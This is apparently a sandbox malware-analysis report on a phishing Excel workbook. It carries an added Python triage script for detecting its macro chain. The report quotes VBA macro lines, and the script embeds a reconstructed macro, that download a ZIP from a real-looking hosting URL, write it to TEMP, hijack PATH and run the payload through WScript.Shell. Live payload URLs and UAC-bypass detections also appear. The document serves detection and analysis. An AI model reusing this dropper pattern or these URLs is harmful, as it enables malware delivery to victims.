                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                          Source: vbaProject.bin | String found in binary or memory: https://tursiian.com/7z.txt
                          Source: ~DFE94CD9633EB51867.TMP.0.dr, vbaProject.bin | String found in binary or memory: https://tursiian.com/7z.txt$
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
                          Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknown | HTTPS traffic detected: 149.137.128.16:443 -> 192.168.2.4:49722 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49737 version: TLS 1.2

                          System Summary

                          Source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: screenshotOCR: Enable Editing Required 10 11 12 Please click 'Enable Editing' to allow the Invoice Viewer to functi
                          Source: PO202503D.xlsmOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
                          Source: PO202503D.xlsmOLE, VBA macro line: Open Environ("TEMP") & "\invoice_log.txt" For Append As #fileNum
                          Source: PO202503D.xlsmOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
                          Source: PO202503D.xlsmOLE, VBA macro line: currentPath = shell.Environment("PROCESS")("PATH")
Source: PO202503D.xlsm OLE, VBA macro line: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPath
Source: PO202503D.xlsm OLE, VBA macro line: temp = Environ("TEMP") & "\invoice_temp\"
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function ExecuteFile, String wscript: Set shell = CreateObject("WScript.Shell")
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function LogMessage, String environ: Open Environ("TEMP") & "\invoice_log.txt" For Append As # fileNum
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function AddToPath, String wscript: Set shell = CreateObject("WScript.Shell")
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function AddToPath, String environ: currentPath = shell.Environment("PROCESS")("PATH")
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function AddToPath, String environ: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPath
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function ViewInvoiceOnline, String environ: temp = Environ("TEMP") & "\invoice_temp\"
Source: PO202503D.xlsm Stream path 'VBA/Module2' : found possibly 'ADODB.Stream' functions open, read, write
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function WriteBinaryFile, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip")
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function DownloadFile, API IServerXMLHTTPRequest2.Open("GET","https://f004.backblazeb2.com/file/mdocument/PO202502DAKE.zip",False)
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function LogMessage, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_log.txt")
Source: PO202503D.xlsm Stream path 'VBA/Module2' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function DownloadFile, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
Source: VBA code instrumentation OLE, VBA macro: Module Module2, Function DownloadTextFile, found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send
Source: PO202503D.xlsm Stream path 'VBA/Module2' : found possibly 'WScript.Shell' functions currentdirectory, environment, exec, run, environ
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
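The instrumentation lines above describe one macro chain: Workbook_Open triggers a ServerXMLHTTP download (DownloadFile), ADODB.Stream writes the body to %TEMP%\invoice_temp (WriteBinaryFile), AddToPath prepends that folder to the process PATH so the dropped binary and its DLLs resolve first, and ExecuteFile runs it through WScript.Shell. As an added example (not Joe Sandbox code, and not the macro's full source, which the report does not include), the Python below performs the static triage that surfaces these indicators: it splits VBA text into procedures and records, per procedure, which COM objects are instantiated and which environment or PATH manipulations appear, then decides whether the full download-write-execute chain is present. The embedded VBA sample is constructed: the report's quoted lines sit under the module and function names it gives, while the MSXML2.ServerXMLHTTP.6.0 ProgID, the Run call, the argument lists and the Workbook_Open body are assumed glue so the text parses.

```python
"""Static VBA triage for the download-and-execute pattern flagged above.
Added example, not Joe Sandbox code; SAMPLE_VBA is constructed (see comments)."""
import re

# Constructed sample: lines quoted in the report plus assumed glue
# (the ProgID, the Run call and the argument lists are assumptions).
SAMPLE_VBA = r'''
Private Sub Workbook_Open()
    ViewInvoiceOnline
End Sub

Function DownloadFile(url As String, dest As String) As Boolean
    Set http = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    http.Open "GET", "https://f004.backblazeb2.com/file/mdocument/PO202502DAKE.zip", False
    http.send
    If http.Status = 200 Then WriteBinaryFile dest, http.responseBody
End Function

Sub WriteBinaryFile(path As String, data As Variant)
    Set stm = CreateObject("ADODB.Stream")
    stm.Open
    stm.Type = 1
    stm.Write data
    stm.SaveToFile path, 2
End Sub

Sub AddToPath(folder As String)
    Set shell = CreateObject("WScript.Shell")
    currentPath = shell.Environment("PROCESS")("PATH")
    shell.Environment("PROCESS")("PATH") = folder & ";" & currentPath
End Sub

Sub ExecuteFile(exe As String)
    Set shell = CreateObject("WScript.Shell")
    shell.Run exe, 0, False
End Sub

Sub LogMessage(msg As String)
    Open Environ("TEMP") & "\invoice_log.txt" For Append As #fileNum
End Sub

Sub ViewInvoiceOnline()
    temp = Environ("TEMP") & "\invoice_temp\"
End Sub
'''

PROC_START = re.compile(r'^\s*(?:(?:Private|Public)\s+)?(?:Sub|Function)\s+(\w+)', re.I)
PROC_END = re.compile(r'^\s*End\s+(?:Sub|Function)\b', re.I)
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)

# Each indicator is a regex applied to a single procedure (header included).
INDICATORS = {
    "autoopen":     re.compile(r'\b(?:Workbook_Open|Auto_Open|Document_Open|AutoOpen)\b', re.I),
    "wsh_shell":    re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"', re.I),
    "xmlhttp":      re.compile(r'CreateObject\s*\(\s*"(?:MSXML2\.)?(?:Server)?XMLHTTP'
                               r'|\.(?:responseBody|responseText)\b', re.I),
    "adodb_stream": re.compile(r'CreateObject\s*\(\s*"ADODB\.Stream"', re.I),
    "path_hijack":  re.compile(r'Environment\s*\(\s*"PROCESS"\s*\)\s*\(\s*"PATH"\s*\)\s*=', re.I),
    "temp_dir":     re.compile(r'Environ\s*\(\s*"TEMP"\s*\)', re.I),
    "shell_exec":   re.compile(r'\.(?:Run|Exec)\s', re.I),
}


def split_procedures(src):
    """Return {procedure name: full text} for every Sub/Function in src."""
    procs, name, buf = {}, None, []
    for line in src.splitlines():
        m = PROC_START.match(line)
        if m and name is None:
            name, buf = m.group(1), [line]
            continue
        if name is not None:
            buf.append(line)
            if PROC_END.match(line):
                procs[name] = "\n".join(buf)
                name, buf = None, []
    return procs


def scan_procedure(body):
    """Set of indicator names whose regex matches anywhere in the procedure."""
    return {tag for tag, rx in INDICATORS.items() if rx.search(body)}


def triage(src):
    """Per-procedure indicators, extracted URLs and a chain verdict."""
    hits = {name: scan_procedure(body) for name, body in split_procedures(src).items()}
    found = set().union(*hits.values())
    chain = ({"autoopen", "xmlhttp", "adodb_stream"} <= found
             and bool(found & {"wsh_shell", "shell_exec"}))
    return {"procedures": hits, "urls": sorted(set(URL_RE.findall(src))),
            "download_execute_chain": chain}


if __name__ == "__main__":
    report = triage(SAMPLE_VBA)
    for proc, tags in report["procedures"].items():
        print(f"{proc:18s} {', '.join(sorted(tags)) or '-'}")
    print("URLs:", report["urls"])
    print("download-and-execute chain:", report["download_execute_chain"])
```

The verdict deliberately requires an auto-run entry point plus all three stages rather than any single COM object, because ADODB.Stream or WScript.Shell alone is common in legitimate workbooks; the per-procedure breakdown is what tells an analyst which function to read first.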
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CE93D90 SetLastError,NtUnmapViewOfSection,GetLastError
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CDE3D90 SetLastError,NtUnmapViewOfSection,GetLastError
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FF6220A7ED0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FF6220A57C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FF6220A43E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC6BCEE
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC63CC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCDFC80
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC99ED6
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC63E9F
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCABFF0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCDB900
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD15A20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD0F9A0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD0DC60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCA7BA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD214B0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC91656
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCA3620
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD0D5C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD0F5C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC77860
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD01800
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC7F780
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCFF0C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD0F240
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCDD280
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC78E70
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC7EE60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD0EF40
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC7EF60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC94A60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD10C50
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCD8BE0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC6E760
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCD8820
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD167D0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CC967E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD7E120
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCBC250
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CCA0230
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CD12330
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEB7D40
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF4BD60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEB5D80
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEA98C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEA39DF
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEC79C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEE1B40
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEDDAC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF4B580
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEDB6E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEB1860
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEA3800
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CED97DD
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF3D220
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF45220
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEB7360
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF47400
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CFBD280
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEB7460
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEDB440
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEFB3A0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF4CDC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEA8E40
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF4ACC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF54EB0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF3EEE0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF60900
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEDAB30
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF4EC20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF14AE0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEB8500
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEAE5A0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEE2770
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CECC756
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF3C7A0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEF61C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEDE140
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEE0120
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF48260
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEF61C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF502B0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CF14300
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe Code function: 12_2_00007FFC9CEA83D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140011970
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140023B70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_00000001400276B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140023FF0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_00000001400137F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_00000001400058E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014000D960
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014000E960
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014001E980
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_00000001400311C4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_00000001400149E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014003021C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_00000001400162A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140012B70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014003538C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140023BE6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140036C58
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014000AC70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014002E48C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014000FCA0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_00000001400374BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014002B57C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014001DDD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140016E10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014001BE40
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014001B650
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014001DE51
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140017E70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014001C680
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_000000014000A6C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140010ED0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe Code function: 16_2_0000000140037F68
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FF6E44A7ED0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FF6E44A57C0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FF6E44A43E0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBBBCEE
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC2FC80
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBE9ED6
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBB3E9F
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBFBFF0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC2B900
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC65A20
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC5F9A0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC4FB40
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC5DC60
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC714B0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBE1656
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBF3620
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC5D5C0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC5F5C0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBBB5E7
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBC7860
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBCF780
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC5F240
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC2D280
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBCEE60
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBC8E72
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC5EF40
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBCEF60
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBC4A40
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC60C50
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC28BE0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBC4640
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBBE760
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC28820
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC667D0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CBE67E0
